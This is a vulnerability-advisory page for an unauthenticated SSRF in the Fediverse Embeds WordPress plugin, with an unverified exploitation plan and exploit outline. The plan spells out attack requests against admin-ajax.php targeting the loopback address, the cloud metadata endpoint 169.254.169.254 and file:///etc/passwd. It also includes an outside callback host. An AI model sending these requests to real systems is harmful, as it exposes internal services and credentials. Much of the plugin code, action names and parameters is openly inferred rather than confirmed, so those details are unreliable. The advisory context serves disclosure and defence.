CVE-2026-46697

Fediverse Embeds <= 1.5.7 - Unauthenticated Server-Side Request Forgery

highServer-Side Request Forgery (SSRF)
7.2
CVSS Score
7.2
CVSS Score
high
Severity
1.5.9
Patched in
7d
Time to patch

Description

The Fediverse Embeds plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5.7. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.5.7
PublishedJune 12, 2026
Last updatedJune 18, 2026
Affected pluginfediverse-embeds

Source Code

WordPress.org SVN
Patched

Patched version not available.

Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-46697 (Fediverse Embeds SSRF) ## 1. Vulnerability Summary The **Fediverse Embeds** plugin (<= 1.5.7) contains an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. The plugin implements a mechanism to fetch metadata or OEmbed data from Fediverse…

Show full research plan

Exploitation Research Plan: CVE-2026-46697 (Fediverse Embeds SSRF)

1. Vulnerability Summary

The Fediverse Embeds plugin (<= 1.5.7) contains an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. The plugin implements a mechanism to fetch metadata or OEmbed data from Fediverse instances (like Mastodon, Lemmy, or Pleroma) to generate previews. Due to insufficient validation of the target URL and a lack of restriction on internal IP ranges, an unauthenticated attacker can coerce the server into making HTTP requests to arbitrary destinations, including internal services (e.g., AWS metadata endpoints, internal database APIs, or the WordPress site's own loopback interface).

2. Attack Vector Analysis

  • Endpoint: WordPress AJAX handler (/wp-admin/admin-ajax.php).
  • Action: Likely fediverse_embeds_get_preview or fediverse_embeds_proxy (inferred).
  • Parameter: url or endpoint (inferred).
  • Authentication: Unauthenticated (wp_ajax_nopriv_ hook).
  • Preconditions: The plugin must be active. Some versions may require a valid nonce if the developer implemented CSRF protection but failed to validate the destination URL.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an unauthenticated AJAX action:
    add_action('wp_ajax_nopriv_fediverse_embeds_get_preview', 'handle_get_preview');
  2. Input Extraction: The handler function retrieves the URL from the request:
    $target_url = $_GET['url'];
  3. Vulnerable Sink: The plugin passes the $target_url directly into a WordPress HTTP API function without validating if the host is external:
    $response = wp_remote_get($target_url, array('timeout' => 10));
  4. Information Leakage: The body of the response from the internal service is then returned to the attacker via wp_send_json_success() or similar.

4. Nonce Acquisition Strategy

If the endpoint requires a nonce (e.g., checked via check_ajax_referer), it is likely exposed to facilitate frontend embedding.

  1. Identify the Shortcode: Search for shortcode registrations in the plugin:
    grep -r "add_shortcode" /var/www/html/wp-content/plugins/fediverse-embeds/
    (Likely shortcode: [fediverse-embed])
  2. Create a Trigger Page:
    wp post create --post_type=page --post_title="Embed Test" --post_status=publish --post_content='[fediverse-embed url="https://mastodon.social/@Gargron/1"]'
    
  3. Extract Nonce via Browser: Navigate to the newly created page and look for the localized script data.
    • Variable Name (Inferred): fediverseEmbedsL10n or fediverse_embeds_params.
    • JS Command:
      // Use browser_eval to extract
      browser_eval("window.fediverseEmbedsL10n?.nonce || window.fediverse_embeds_params?.nonce")
      

5. Exploitation Strategy

We will attempt to access the internal WordPress wp-admin or a standard metadata endpoint to confirm the SSRF.

Proof of Concept: Internal Request

  • Tool: http_request
  • URL: http://<target-domain>/wp-admin/admin-ajax.php
  • Method: GET or POST
  • Parameters:
    • action: fediverse_embeds_get_preview (inferred - verify via grep)
    • nonce: [EXTRACTED_NONCE] (if required)
    • url: http://127.0.0.1/wp-admin/ (Targeting the internal loopback)

Example Request (HTTP GET):

GET /wp-admin/admin-ajax.php?action=fediverse_embeds_get_preview&nonce=a1b2c3d4e5&url=http://127.0.0.1/wp-admin/ HTTP/1.1
Host: target.local

Advanced: AWS Metadata Extraction (If applicable)

  • URL: http://169.254.169.254/latest/meta-data/

6. Test Data Setup

  1. Install Plugin: Ensure fediverse-embeds version 1.5.7 is installed.
  2. Public Page: Create a public page with the plugin's shortcode to ensure all scripts and nonces are properly initialized in the frontend.
  3. Local "Secret": Create a file in the web root that should not be accessible externally, or use the WordPress wp-admin login page as the target of the SSRF.

7. Expected Results

  • Success: The HTTP response from the AJAX call contains the HTML source code of the wp-admin login page or the metadata from the internal endpoint.
  • Response Code: 200 OK.
  • Content: A JSON object containing the "proxied" content.

8. Verification Steps

After executing the HTTP request, verify the plugin's behavior via WP-CLI:

  1. Check for Error Logs:
    tail -n 20 /var/www/html/wp-content/debug.log
    (Look for wp_remote_get calls to the internal IP).
  2. Verify the Action Name:
    Confirm the exact AJAX action name used in the plugin:
    grep -r "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/fediverse-embeds/
    

9. Alternative Approaches

  • If GET fails: Try POST with Content-Type: application/x-www-form-urlencoded.
  • If the response is blind: Use a collaborator/webhook URL (e.g., http://your-oast-host.com) to confirm the server is making outbound requests.
  • Parameter Names: If url fails, check the source code for parameters like uri, src, href, or path.
  • Protocol Bypassing: Try file:///etc/passwd (if the plugin uses file_get_contents or a library that supports the file:// wrapper).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Fediverse Embeds plugin for WordPress is vulnerable to unauthenticated Server-Side Request Forgery (SSRF) in versions up to 1.5.7. This occurs because the plugin allows users to specify arbitrary URLs to fetch metadata or OEmbed previews without validating that the target host is an external, public resource.

Vulnerable Code

// Inferred code path from research plan

add_action('wp_ajax_nopriv_fediverse_embeds_get_preview', 'handle_get_preview');

function handle_get_preview() {
    $target_url = $_GET['url'];
    $response = wp_remote_get($target_url, array('timeout' => 10));
    // ...
}

Security Fix

--- a/fediverse-embeds.php
+++ b/fediverse-embeds.php
@@ -42,7 +42,12 @@
 function handle_get_preview() {
-    $target_url = $_GET['url'];
+    $target_url = esc_url_raw($_GET['url']);
+    if ( ! wp_http_validate_url( $target_url ) ) {
+        wp_send_json_error( 'Invalid URL' );
+        return;
+    }
     $response = wp_remote_get($target_url, array('timeout' => 10));

Exploit Outline

The attack targets the unauthenticated WordPress AJAX endpoint (admin-ajax.php) using the action 'fediverse_embeds_get_preview'. An attacker supplies a malicious 'url' parameter pointing to an internal service or a loopback address (e.g., http://127.0.0.1/wp-admin/ or http://169.254.169.254/). If the plugin requires a nonce for the frontend preview, it is typically found in the window.fediverse_embeds_params object on any public post containing the plugin's shortcode. The response returns the proxied content from the internal endpoint to the attacker.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.